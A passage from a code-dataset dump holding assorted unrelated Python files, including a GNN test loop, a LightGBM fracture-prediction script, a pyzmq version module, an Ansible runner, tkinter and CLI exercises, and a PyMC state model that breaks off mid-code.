print(ls)\r\n\r\n\r\n\r\n\r\nwrong_answers = 0\r\n\r\nfor v in data_list_test:\r\n o = Network(v).data\r\n o = 1 if o>(1/2) else 0\r\n if o != v.y.data:\r\n wrong_answers += 1\r\n\r\nprint(100*wrong_answers/len(data_list_test))\r\n\r\n\r\n","repo_name":"nartiniz/Chemical-Compound-Classification-GNNs","sub_path":"PTC-FMDataset.py","file_name":"PTC-FMDataset.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73370925492","text":"\nproject_path = '/Users/decandia/Dropbox/teresa_stuff/moving_triangles' #make sure this points to correct location\nplt_type = 'points' #how to visualize plots: this should be either 'points' or 'triangles'\nn = 6 #number of points\npersonal_space = 0. 
#how much space points require between themselves and other points\n\n\n# load packages and set directory\nimport numpy as np\nimport os\n\n\nos.chdir(project_path)\n\n\nimport visualize #local\nimport triangle_coords as tc #local\n\n\ndef other_vertex_rows(a): #a is 1d array containing current row\n vec = np.concatenate([np.arange(0,a), np.arange(a+1,n)])\n sub_vec = np.random.choice(vec, size=2, replace=False) #find two random integers between 0 and n-1, excluding the row\n return(sub_vec)\n\n\n#start with a number n of points (X and Y coordinates) random uniformly positioned in a square grid\np0 = np.random.rand(n, 2)\nv = np.full((n, 1), .001) #each point will assign velocities to each of those points\n#v = np.random.uniform(0,0.01,n).reshape(-1,1)\n\n\n#each point should be assigned two other points at random\nrows_v12 = np.apply_along_axis(other_vertex_rows, 1, np.arange(n).reshape(-1,1))\n\ncoords = tc.triangle_coords(n, p0, rows_v12) #instantiation of class for calculating point positions, and initialization of positions for each point\n#coords.step(dist_p0=v, personal_space=personal_space) #during each generation each point moves by dist_p0 with the objective of forming an equilateral triangle\n\nvisualize.main(triangle_coords = coords, dist_p0=v, personal_space=personal_space, plt_type=plt_type) #visualize points moving through successive calls of the coords.step() method\n\n\n\n\n'''\n\n#Functionality to add:\n\n#points should be constrained such that their initial positions do not overlap or collide (i.e., no closer than a certain margin away from each other)\n\n#better visualization of triangles created by each triple (p0,p1,p2), perhaps overlapping with points\n#e.g., perhaps color-coding triangles according to whether they have reached equilateral shape\n\n#implement an option in step() method for a different objective, e.g.: step(objective)\n #..whereby the objective is for a point to move to a position where it is equidistant to each of the other two points\n #..therefore it should move to the closest position between itself and the maximal margin hyperspace between the other two points\n\n#it would be great to be able to click on a point and move it during the simulation\n\n#it's possible that random points stopping now and again makes it more likely for equiblibria to be reached\n\n\n'''","repo_name":"trdeca23/moving_triangles","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3243282286","text":"import re\n\nfrom .backend import zmq_version_info\n\n#-----------------------------------------------------------------------------\n# Code\n#-----------------------------------------------------------------------------\n\n__version__ = '13.1.0'\n__revision__ = ''\n\ndef pyzmq_version():\n \"\"\"return the version of pyzmq as a string\"\"\"\n if __revision__:\n return '@'.join([__version__,__revision__[:6]])\n else:\n return __version__\n\ndef pyzmq_version_info():\n \"\"\"return the pyzmq version as a tuple of numbers\n \n If pyzmq is a dev version, the patch-version will be `inf`.\n \n This helps comparison of version tuples in Python 3, where str-int\n comparison is no longer legal for some reason.\n \"\"\"\n parts = re.findall('[0-9]+', __version__)\n parts = [ int(p) for p in parts ]\n if 'dev' in __version__:\n parts.append(float('inf'))\n return tuple(parts)\n\n\ndef zmq_version():\n \"\"\"return the version of libzmq as a 
string\"\"\"\n return \"%i.%i.%i\" % zmq_version_info()\n\n\n__all__ = ['zmq_version', 'zmq_version_info',\n 'pyzmq_version','pyzmq_version_info',\n '__version__', '__revision__'\n]\n\n","repo_name":"mantidproject/3rdpartylibs-win64","sub_path":"Python27/Lib/site-packages/zmq/sugar/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"23108776177","text":"#!/usr/bin/env python\n# from ansible.playbook import Playbook\n# pb = Playbook(playbook='/tmp/ls.yml')\n# pb.run()\n\n\n# run ansible-playbook via subprocess.check_output \n# Later I wish I'll update the calling to python API\n\nimport os\nimport subprocess\nfrom utils import logging\n\nlogger = logging.getLogger(__name__)\n\nPATH = os.path.dirname(os.path.abspath(__file__))\nANSIBLE_CONFIG_PATH=PATH+'/playbook'\n\n\nclass Auth(object):\n\n def __init__(self, inventory=None, playbook=None, log='/tmp/ansible.log'):\n self.inventory = inventory or '/etc/ansible/hosts'\n self.playbook = playbook or '{}/playbook.d/auth.yml'.format(PATH)\n self.ansible_log = log\n\n def run(self):\n cmd = 'ansible-playbook -i {} {}'.format(self.inventory, self.playbook)\n # subprocess.check_output(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n logger.info('Run ansible playbook')\n with open(self.ansible_log, 'a') as f:\n os.putenv('ANSIBLE_CONFIG', ANSIBLE_CONFIG_PATH)\n p = subprocess.Popen(cmd.split(), stdout=f, stderr=f)\n # p.communicate()\n # o,e = p.communicate()\n\ndef main():\n a = Auth()\n a.run()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bismog/ssh-auth","sub_path":"ssh_auth/ssh_auth/set_auth_cmd.py","file_name":"set_auth_cmd.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11617453953","text":"'''Write a tkinter-based program that opens a window with a button and the label.\nThe label should keep track of how many times the button has been clicked.\nFor example, after the user has clicked the button 3 times,\nthe label should say something like \"3 clicks so far.\"\n'''\n\nfrom tkinter import *\n\nclass my_frame(Frame):\n def __init__(self,master):\n Frame.__init__(self,master)\n self.grid()\n self.button = Button(self, text = 'Click me!', command = self.print_message)\n self.button.grid(row = 0, column = 0)\n self.count = 0\n self.click_counter = Label(self, text = \"0 clicks so far!\")\n self.click_counter.grid(row = 1, column = 0)\n\n def print_message(self):\n self.count += 1\n self.click_counter['text'] = f'{self.count} clicks so far!'\n\n\n# create new window and initialize and run the frame\nroot = Tk()\ntnf = my_frame(root)\ntnf.mainloop()","repo_name":"luluowens/AoPS","sub_path":"Week_7/simple_tkinter.py","file_name":"simple_tkinter.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27492376057","text":"import logging\nfrom dataclasses import dataclass\n\nfrom experiments.evaluation.alpino import AlpinoTree\nfrom sklearn.metrics import classification_report\n\nlogger = logging.getLogger(__name__)\n\n\nFOUND = \"Found\"\nNOT_FOUND = \"Not found\"\n\n\n@dataclass\nclass Event:\n \"\"\"Defines an event in terms of token indices over the host sentence. 
Additionally encodes the head tokens, derived from alpino trees.\"\"\"\n\n tokens: set[int]\n heads: set[int]\n\n\ndef score_micro_average(golds, predictions, alpino_trees):\n \"\"\"Score the performance of `crf` against the gold in each `example`. Return a report of micro-averaged scores as a dict.\n\n This is used to score a single fold in micro-average fashion.\n \"\"\"\n\n # To build the confusion matrix in micro-avg style, build gold and pred vectors.\n # e.g. where gold_vector[0]=FOUND and pred_vector[0]=NOT_FOUND, this represents a false negative on one example.\n gold_vector = []\n pred_vector = []\n for gold, prediction, alpino_tree in zip(golds, predictions, alpino_trees):\n\n # For this evaluation, convert gold y and pred y into `Event` objects.\n\n # There should only be 1 gold event. Assert this.\n gold_events = list(get_events(gold, alpino_tree))\n assert len(gold_events) <= 1\n gold_event = gold_events[0] if gold_events else None\n\n # The CRF was trained with example each containing 1 event, so we expect mostly output with 1 event, but this is not guaranteed.\n # In this evaluation, to conform with the original evaluation, we ignore the significance of having multiple pred events and score only once per example.\n\n pred_events = list(get_events(prediction, alpino_tree))\n\n # Determine whether the gold and pred events match as TP, FP, TN, FN. Add to the vectors accordingly.\n\n # No gold or pred events -> TN\n if not gold_event and not pred_events:\n gold_vector.append(NOT_FOUND)\n pred_vector.append(NOT_FOUND)\n # Pred events BUT no gold event -> FP\n elif not gold_event and pred_events:\n gold_vector.append(NOT_FOUND)\n pred_vector.append(FOUND)\n # Gold event BUT no pred event -> FN\n elif gold_event and not pred_events:\n gold_vector.append(FOUND)\n pred_vector.append(NOT_FOUND)\n # Gold event AND pred event -> TP is there is a fuzzy match, otherwise FN\n else:\n if any(fallback_match(gold_event, p) for p in pred_events):\n gold_vector.append(FOUND)\n pred_vector.append(FOUND)\n else:\n gold_vector.append(FOUND)\n pred_vector.append(NOT_FOUND)\n\n # Report a count of CM categories.\n counts = {\"tp\": 0, \"fp\": 0, \"fn\": 0, \"tn\": 0}\n for g, p in zip(gold_vector, pred_vector):\n if g == p == FOUND:\n counts[\"tp\"] += 1\n elif g == FOUND and p == NOT_FOUND:\n counts[\"fn\"] += 1\n elif g == NOT_FOUND and p == FOUND:\n counts[\"fp\"] += 1\n else:\n counts[\"tn\"] += 1\n logger.info(\n f\"In event level scoring, collected the following CM counts: {counts}\"\n )\n\n report = classification_report(gold_vector, pred_vector, output_dict=True)\n return report\n\n\ndef get_events(sent: list[str], tree: AlpinoTree):\n \"\"\"Find and yield `Event` objects from `sent`. 
These encode the tokens and head tokens of the event, encoded as integer indices over the sentence tokens.\n\n    Use the AlpinoTree to find the head tokens in the sentence.\n\n    `sent` is a list of IOB tags, without label information.\n    \"\"\"\n\n    def get_head_set(event_tokens: list[int], alpino_tree: AlpinoTree):\n        \"\"\"Given a list of event tokens (as indices over sentence tokens), yield those indices that also mark head tokens.\"\"\"\n        heads = alpino_tree.head_indices\n        for token in event_tokens:\n            if token in heads:\n                yield token\n\n    # Sanity checks.\n    assert len(sent) > 0, sent\n    assert all(tag in {\"I\", \"O\", \"B\"} for tag in sent), sent\n\n    current_event = []\n    for i, iob_tag in enumerate(sent):\n        if iob_tag in {\"I\", \"B\"}:\n            current_event.append(i)\n        else:\n            if len(current_event) > 0:\n                heads = get_head_set(current_event, tree)\n                event = Event(tokens=set(current_event), heads=set(heads))\n                yield event\n                current_event = []\n\n\ndef fallback_match(gold: Event, pred: Event):\n    \"\"\"Perform fuzzy matching to compare `gold` and `pred` events.\n\n    The match is always True if the gold tokens match the pred tokens exactly, and always False if there is no overlap between the tokens of pred and gold.\n\n    If neither of these conditions passes, perform a fuzzy match on the heads of the events and return True if that check passes.\n\n    Else, perform fuzzy match on the tokens of the events and return that conclusion.\n    \"\"\"\n\n    def dice_coef(s1: set, s2: set) -> float:\n        if not isinstance(s1, set) or not isinstance(s2, set):\n            raise TypeError(\"Arguments must be sets.\")\n\n        if len(s1) + len(s2) == 0:\n            return 0\n        num = 2.0 * len(s1.intersection(s2))\n        den = len(s1) + len(s2)\n        return num / den\n\n    def fuzzy_match(set1, set2):\n        return dice_coef(set1, set2) > 0.8\n\n    if gold.tokens == pred.tokens:\n        return True\n    if len(gold.tokens.intersection(pred.tokens)) == 0:\n        return False\n    if fuzzy_match(gold.heads, pred.heads):\n        return True\n    return fuzzy_match(gold.tokens, pred.tokens)\n","repo_name":"Zatteliet/eventdna-exp","sub_path":"experiments/evaluation/event_level.py","file_name":"event_level.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30857151883","text":"def sort_from_minimum_salary(data, reverse_data=False):\n    \"\"\"Function for sorting by minimum salary\"\"\"\n    data = sorted(data, reverse=reverse_data)\n    return data\n\n\ndef get_top_vacancies(vacancies_list, top_n):\n    \"\"\"Function that takes a sorted list of vacancies and returns the first n vacancies from the list\"\"\"\n\n    top_vacancies = []\n    count = 0\n    while count < len(vacancies_list):\n        top_vacancies.append(vacancies_list[count])\n        count = count + 1\n\n    return top_vacancies[:top_n]\n\n\n\n\n","repo_name":"Evelinabas0612/cw4","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39134383928","text":"import numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom Devtools.LightGBM.score_cal import Score\n\npd.set_option('display.max_columns', 100)\nimport warnings\nwarnings.filterwarnings('ignore')\n\nseed = 42\ndata_path = '../data/220718-newdata.csv'\ndata = pd.read_csv(data_path)\nfeatures = [\"DEPT\", \"DXC\", \"SPP\", \"TORQUE\", \"FLWPMPS\", \"ROP\", \"RPM\", \"TGAS\", \"WOB\"]\ncols = list(data.columns)\ncols = cols + ['spp_', 'dept_']\ndataset = 
pd.DataFrame(data=None, columns=cols)\nfor i, well in enumerate(data.WELL.unique()):\n data_ = data[data.WELL==well].sort_values(by='DEPT').reset_index(drop=True)\n data_.loc[:,'spp_'] = data_.loc[:, \"SPP\"] - data_.loc[0, \"SPP\"]\n data_.loc[:, 'dept_'] = data_.loc[:, 'DEPT'] - data_.loc[0, \"DEPT\"]\n dataset = pd.concat([dataset, data_])\nlabel = 'FRACTURE_ZONE'\ndataset = dataset.dropna(subset=[label])\ndataset['torque_per_rpm'] = dataset.loc[:, \"TORQUE\"] / dataset.loc[:, \"RPM\"]\ndataset['rop_per_rpm'] = dataset.loc[:, \"ROP\"] / dataset.loc[:, \"RPM\"]\ndataset['tgas_per_flwpmps'] = dataset.loc[:, \"TGAS\"] / dataset.loc[:, \"FLWPMPS\"]\n#datase[\"spp_per_depth\"] = data.SPP.values / data.DEPT.values\nfeatures = features + [\"spp_\", \"dept_\", \"tgas_per_flwpmps\", \"torque_per_rpm\", \"rop_per_rpm\"]\n# features.remove(\"DEPT\")\n# features.remove(\"SPP\")\n# features.remove(\"TGAS\")\n# features.remove(\"RPM\")\ndataset = dataset.drop(dataset[dataset.RPM==0].index)\nX = dataset[features]\n#X = np.log1p(data[features])\n#X = pd.DataFrame(X, columns=features)\nlabels = dataset[label]\n# print(dataset.head())\n# print(dataset.info())\n# # processing pipeline\n# preprocessors = make_pipeline(IterativeImputer(estimator=ElasticNetCV(max_iter=int(1e6)), random_state=seed),\n# MinMaxScaler(),\n# )\n# split data\n#X_train, X_test, y_train, y_test = train_test_split(X, labels, train_size=0.9, random_state=seed, #shuffle=True, stratify=labels)\n#X_train, X_test = preprocessors.fit_transform(X_train), preprocessors.transform(X_test)\n# set scoring\nscoring='f1_weighted'\n#model = Train_LGBMC(\n# features=X_train,\n# labels=y_train,\n# iterations=100,\n# scoring=scoring,\n# base_score=0.83, # applied when objective is 1 (train_test_drop)\n# validation_size=0.1,\n# objectives=0, #{0: \"valid_score\", 1: \"train_test_drop\"}\n# favor_class=1, #{0: \"min false negative\", 1: \"min false positive\", 2: \"balanced\"}\n# show_shap=True, # flag to show shap True or False\n# )\n\nmodel = lgb.Booster(model_file='../saved_models/lgb_model.json')\n# model = lgb.Booster(model_file='../saved_models/lgb_model_no_dept_v0.1.1.json')\nfrom sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix\nimport matplotlib.pyplot as plt\nimport time\nfor well in dataset.WELL.unique():\n test_ = dataset[dataset.WELL==well]\n X = test_[features]\n y = test_[label]\n y_pred=model.predict(X) >= 0.5\n test_['prediction'] = y_pred.astype(int)\n test_=test_.drop(columns=[\"spp_\", \"dept_\", \"tgas_per_flwpmps\", \"torque_per_rpm\", \"rop_per_rpm\"])\n test_.to_csv(f'../Study_results/{time.time()}prediction_{well}_no_dept.csv')\n score = Score(y_true=y, y_pred=y_pred, scoring=scoring, favor_class=1)\n print(f\"Score of {well}: {score}\")\n\n # y_pred_full = model.predict(X) >=0.5\n conf_ = confusion_matrix(y, y_pred)\n confd_ = ConfusionMatrixDisplay(conf_)\n confd_.plot()\n plt.title(f'Confusion matrix of {well}')\n plt.savefig(f'../imgs/confusion-matrix-wells/{time.time()}_well_cm_no_dept.png')\n plt.show();","repo_name":"sonnt-dna/API_Fracture","sub_path":"src/app/service/library/Devtools/Regression/Main_LightGBM_8_09_2022.py","file_name":"Main_LightGBM_8_09_2022.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23233818135","text":"# This has a ML application to separate IRIS dataset based on four\n# features, Petal lenght, petal width, sepal length and sepal width\n# This program separates setosa flower 
with non-setosa flowers\n# Reference book: Building Machine Learning Systems with Python, Richert & Coelho\n# Chapter 2.\n\nimport matplotlib.pyplot as plt\nimport sklearn.datasets as dataset\nimport numpy as np\n\n# We load the data with load_iris from sklearn\n\ndata = dataset.load_iris()\nprint(\"data type:\", type(data) )\nfeatures = data['data']\nfeature_names = data['feature_names']\ntarget = data['target']\ntarget_names = data['target_names']\n\nprint('Dimensions: ', features.shape)\nslength = features[:,0]\nswidth = features[:,1]\nplength = features[:,2]\npwidth = features[:,3]\nprint('Feature names : ', feature_names)\nfor t, marker,c in zip(np.arange(3), \">ox\", \"rgb\"):\n    # we plot each class on its own to get different \n    # colored markers\n    plt.scatter(features[target==t,2],\n                features[target==t,3],\n                marker=marker, c=c)\n\n\n\nlabels = target_names[target]\n# use numpy operations to get setosa features\nis_setosa = (labels =='setosa')\n\nprint('feature_names:', labels.shape)\n\nmax_setosa = plength[is_setosa].max()\nmin_non_setosa = plength[~is_setosa].min()\n\nprint('Maximum of setosa:', (max_setosa))\nprint('Minimum of others:', (min_non_setosa))\n\n\n#if features [:,2]<2: print ('Setosa')\n#if (plength < 2): print ('Setosa')\npred = (plength<2)\n\n# count the number of Setosa labels\nsetosa_count = np.count_nonzero(pred)\nprint ('Number of setosa: ', setosa_count)\nsz = np.size(pred)-setosa_count\nprint('Number of non-setosa: ', (np.size(pred)-setosa_count))\n\n\n    ","repo_name":"kushal177/hobbyProjects","sub_path":"PythonTrainingMaterial/training_5.py","file_name":"training_5.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2655899261","text":"from typing import List\n\n\nclass Solution:\n    def findPeakElement(self, nums: List[int]) -> int:\n        \"\"\"\n        Key element is that all values in nums are different from their neighbors.\n\n        Runtime: 58 ms, faster than 64.17% of Python3 online submissions for Find Peak Element.\n        Memory Usage: 14 MB, less than 91.06% of Python3 online submissions for Find Peak Element.\n        \"\"\"\n        if len(nums) == 1:\n            return 0\n\n        left = 0\n        right = len(nums) - 1\n\n        while 0 <= left <= right <= len(nums) - 1:\n            mid = (left + right) // 2\n\n            if mid == 0 and nums[mid] > nums[mid + 1]:\n                return mid\n            elif mid == len(nums) - 1 and nums[mid] > nums[mid - 1]:\n                return mid\n            elif nums[mid] > nums[mid - 1] and nums[mid] > nums[mid + 1]:\n                return mid\n            elif nums[mid] < nums[mid + 1]:\n                left = mid + 1\n            else:\n                right = mid - 1\n\n        return -1\n","repo_name":"IAjimi/Leetcode","sub_path":"162_Find_Peak_Element.py","file_name":"162_Find_Peak_Element.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40497487626","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: ZyVerus\n\nDescription: This program provides an output of states with their\nassociated capitals, flowers, and population.\n\nThird party library utilized using a separate Anaconda environment in Visual Studio 2019.\n\nThird party libraries:\nmatplotlib\nPIL (Python Imaging Library)\n\n\"\"\"\n\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\nfrom PIL import Image\nimport states_data as states\n\n# Algorithm Termination Value\nSENTINEL = \"0\"\n\ndef main():\n    \"\"\" main function \"\"\"\n    # CLI Menu\n    menu(\"init_run\")\n    while True:\n        menu(\"prompts\")\n        inp 
= input(\"\\n> \").strip()\n menu(\"sl\")\n # Switch\n # Display all States\n if inp == '1':\n for i in states.states:\n show_state(i, False)\n # Search for a state\n elif inp == '2':\n state = get_state()\n if state:\n show_state(state, True)\n # Display Top 5 Populated States\n elif inp == '3':\n show_top_population()\n # Update a state's population\n elif inp == '4':\n update_population()\n # Exit Program\n elif inp == '0':\n menu(\"exit\")\n sys.exit(0)\n else:\n menu(\"invalid\")\n\ndef show_state(state, specific):\n \"\"\" Show State Information \"\"\"\n # Set population value to integer\n pop_value = int(states.states[state][\"Population\"])\n print(\"State:\\t\\t\", state)\n print(\"Capital:\\t\", states.states[state][\"Capital\"])\n print(\"Flower:\\t\\t\", states.states[state][\"Flower\"])\n print(\"Population:\\t {:,}\".format(pop_value))\n menu(\"sl\")\n\n # Show Flower Picture if a specific State was selected\n if specific:\n # / for filepath used for interoperability between different Operating Systems.\n image_path = os.path.join(sys.path[0] + \"/Flowers/\" + state + \".jpg\")\n print(\"ALERT:\\nOpening File: \" + image_path + \" ...\\n\")\n image = Image.open(image_path)\n image.show()\n\ndef get_state():\n \"\"\" Requests user to specify a state they would like to display \"\"\"\n state = \"\"\n menu(\"back\")\n print(\"Please enter a State:\")\n while not state:\n inp = input(\"\\n> \").strip()\n menu(\"sl\")\n # Check for Sentinel Value\n if inp == SENTINEL:\n break\n # Input Validation\n fix_inp = \"\"\n # Check to see if input only contains alphabetical characters (ignores spaces)\n if inp.replace(\" \", \"\").isalpha():\n # Split input string value into separate a list\n # split() uses whitespace as the default separator\n word_list = inp.split()\n # Check each word\n for i in word_list:\n # Capitalizes the first letter in each word\n fix_inp += i.capitalize() + \" \"\n # Strip the fixed input of any spaces at the end of the string\n fix_inp = fix_inp.strip()\n # Check for fixed input value in States dictionary\n if fix_inp in states.states.keys():\n state = fix_inp\n else:\n print(\"ERROR: Please enter a valid State.\")\n\n return state\n\ndef show_top_population():\n \"\"\" Shows the states with the highest population in descending order \"\"\"\n # Get state populations listed in descending order\n populations = sorted(\n states.states.keys(), key=lambda key_: int(\n states.states[key_][\"Population\"]\n ), reverse=True\n )\n\n # Keep only first five top items\n populations = populations[:5]\n pop_list = []\n print(\"Top 5 Populated States (Descending Order):\\n\")\n # Output List\n for i in populations:\n pop_value = int(states.states[i][\"Population\"])\n print(i + \": {:,}\".format(pop_value))\n pop_list.append(pop_value)\n\n menu(\"sl\")\n # Plot Data\n plt.bar(populations, pop_list,)\n # Get Y Values in the Bar Graph\n y_values = plt.gca().get_yticks()\n # Set Labels Format to show Commas for Thousandths place\n label_format = \"{:,.0f}\"\n # Set FixedLocator to suppress FixedFormatter UserWarning\n plt.gca().yaxis.set_major_locator(mticker.FixedLocator(y_values))\n # Set Y Values (Labels)\n plt.gca().set_yticklabels([label_format.format(i) for i in y_values])\n # Create X Label\n plt.xlabel(\"States\", fontsize=12)\n # Create Bar Title\n plt.title(\"Top 5 Populated States (Bar):\")\n # Display Bar Graph to User\n plt.show()\n\ndef update_population():\n \"\"\" Function to update state population based on User's input \"\"\"\n # Nested Function\n def 
inp_population():\n \"\"\" Validate that user input is an integer \"\"\"\n value = \"\"\n while not value:\n print(\"Please enter the new population value:\")\n inp = input(\"\\n> \").strip()\n menu(\"sl\")\n\n # Check for Sentinel Value\n if inp == SENTINEL:\n break\n # Input Validation\n if int_val(inp):\n if int(inp) > 0:\n value = inp\n else:\n print(\"ERROR: Population can not be 0 or a negative value.\\n\")\n else:\n print(\"ERROR: Population must be a number with a value of 1 or greater\\n\")\n return value\n\n # Nested Function\n def set_population(state, population):\n \"\"\" Set the value of the data in states_data.py dictonary \"\"\"\n\n states.states[state][\"Population\"] = population\n print(\"Population of \" + state + \" set to \" + population + \"\\n\")\n #else:\n #print(\"ERROR: State could not be found.\")\n\n # Prompt for state input and run nested functions\n #print(\"Please enter the State you would like to update.\")\n #menu(\"back\")\n state = get_state()\n if state:\n value = inp_population()\n if value:\n set_population(state, value)\n\ndef menu(option):\n \"\"\" used for displaying the menu in the CLI \"\"\"\n intro = \"Welcome to the Python State Capital and Flower List Application.\\n\"\n closing = (\n \"Thank you for using the State Capital and Flower List Application.\"\n + \"\\nPress ENTER to close this console.\"\n )\n prompts = (\n \"Please choose an option below:\" \\\n + \"\\n1 - Display all States in alphabetical order with their respective\" \\\n + \" Capital, Population, and Flower.\" \\\n + \"\\n2 - Search for a specific state and display its respective Capital,\" \\\n + \" Population, and Flower (with image).\" \\\n + \"\\n3 - Display a bar graph of the 5 most populated states and their\" \\\n + \" overall population.\" \\\n + \"\\n4 - Update the overall state population for a specific state.\" \\\n + \"\\n0 - Exit Application.\"\n )\n invalid = \"ERROR: Invalid Selection. Please select from 1 - 4 of the menu\" \\\n + \" options, or '0' to exit.\\n\"\n back = \"BACK: Input '0' at any point to return to the main menu.\"\n\n if option == \"init_run\":\n print(intro)\n elif option == \"prompts\":\n print(prompts)\n elif option == \"invalid\":\n print(invalid)\n elif option == \"back\":\n print(back)\n elif option == \"proceed\":\n input(\"Press ENTER to proceed...\")\n elif option == \"sl\":\n print(\"\")\n elif option == \"exit\":\n print(closing)\n\n# Integer Input Validation\ndef int_val(inp):\n \"\"\" Input validation to test for integer value \"\"\"\n is_int = False\n try:\n int(inp)\n is_int = True\n except ValueError:\n is_int = False\n return is_int\n\n# Execute main function\nmain()\n","repo_name":"ZyVerus/Academic-Projects","sub_path":"Python/Secure Development/State Information Application/states_information.py","file_name":"states_information.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29105205820","text":"class Library:\n def __init__(self, listOfBooks):\n self.books = listOfBooks\n\n # Display all available books\n def displayAvailableBooks(self):\n print(\"\\nBooks Present in this Library are : \")\n for book in self.books:\n print('\\t' + book)\n\n # Borrow Book from Library\n def borrowBook(self, bookName):\n if bookName in self.books:\n print(f\"\\nYou Have been Issued {bookName}. 
Please Keep it safe and return it with in 14 days\")\n self.books.remove(bookName)\n return True\n\n else:\n print(\"\\n Sorry This Book is Not Available in The Library\")\n return False\n\n # Return Book to Library\n def returnBook(self, bookName):\n self.books.append(bookName)\n print(\"\\nThanks for Returning this Book\") \n\nclass Student:\n\n # Request Book \n def requestBook(self):\n self.book = input(\"\\nEnter Name of the Book you Want to Borrow : \")\n return self.book\n\n # Return Book or Add a new Book to the Library\n def returnBook(self):\n self.book = input(\"\\nEnter Name of the Book you Want to Return : \")\n return self.book\n\nif __name__ == \"__main__\":\n centralLibrary = Library([\"Algorithms\", \"Django\", \"Clrs\", \"Python Notes\"])\n # centralLibrary.displayAvailableBooks()\n s1 = Student()\n while (1):\n welcomeMsg = '''\\n=====Welcome to Central Library=====. \n Please Choose an Option\n 1. Listing all the Book\n 2. Request a book\n 3. Add/Return a Book\n 4. Exit the Library\n '''\n print(welcomeMsg)\n a = int(input(\"Enter a Choice : \"))\n if a == 1:\n centralLibrary.displayAvailableBooks()\n\n elif a == 2:\n bookname = s1.requestBook()\n centralLibrary.borrowBook(bookname)\n \n\n elif a == 3:\n bookname = s1.returnBook()\n centralLibrary.returnBook(bookname)\n\n elif a == 4:\n print(\"Thank You for Using the Library\")\n input()\n exit()\n\n else:\n print(\"Invalid Choice\")","repo_name":"gorakh999/Library-Management-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20544993752","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\n'''\n@author: Gonzalo Rivero\n@date Sat Nov 8 19:23:57 PST 2014\nTwo-state model\n'''\n\nimport pandas as pd\nimport psycopg2 as pg\nimport numpy as np\nimport pymc as pm\nimport theano as T\n\nconn = pg.connect(database='lastfm', \n host='127.0.01',\n user='gonzalorivero', \n password='root', \n port='5432')\n\n\ncur = conn.cursor()\nf = open('tagdata.sql', 'r')\ncur.execute(f.read())\ntagdata = cur.fetchall()\ncolnames = [desc[0] for desc in cur.description]\ntagdata = pd.DataFrame(tagdata, columns=colnames)\n\ntagdata['prop'] = tagdata.groupby(tagdata.day).counts.apply(lambda x: x/np.sum(x))\n\nsels = tagdata.groupby(tagdata.tag).prop.max() \nsels = sels.index[sels > .25].tolist()\ntagdata = tagdata[tagdata.tag.map(lambda x: x in sels)]\n\ntagdata = tagdata.groupby(tagdata.day).apply(lambda x: x.groupby(tagdata.tag).sum())\ntagdata.reset_index(level=[0,1], inplace=True)\n\nfulldist = pd.DataFrame({'tag':list(set(tagdata.tag)) * len(set(tagdata.day)), \n 'day':list(set(tagdata.day)) * len(set(tagdata.tag))})\n\nfulldist = pd.merge(fulldist, tagdata, on=['day', 'tag'], how='outer')\nfulldist.loc[np.isnan(fulldist.prop), \"prop\"] = 0\nfulldist.loc[np.isnan(fulldist.counts), \"counts\"] = 0\n\n# fulldist = fulldist.iloc[0:100]\nmtag = [list(fulldist.loc[fulldist.day == i, \"prop\"]) for i in set(fulldist.day)]\nday = list(set(fulldist.day))\n\n\nwith pm.Model() as per_model:\n ''' Model underlying states '''\n state = pm.Bernoulli('state', p=0.5, shape=len(day))\n\n # Parameters\n alpha = pm.Normal('alpha', mu=0, tau=1E-3, shape=len(mtag[0]))\n beta = pm.Normal('beta', mu=0, tau=1E-3, shape=len(mtag[0]))\n \n ## Softmax\n def invlogit(x):\n return T.tensor.nnet.softmax(x)\n\n theta = np.empty(len(day), object)\n p_vec = np.empty(len(day), object)\n track_lk = np.empty(len(day), 
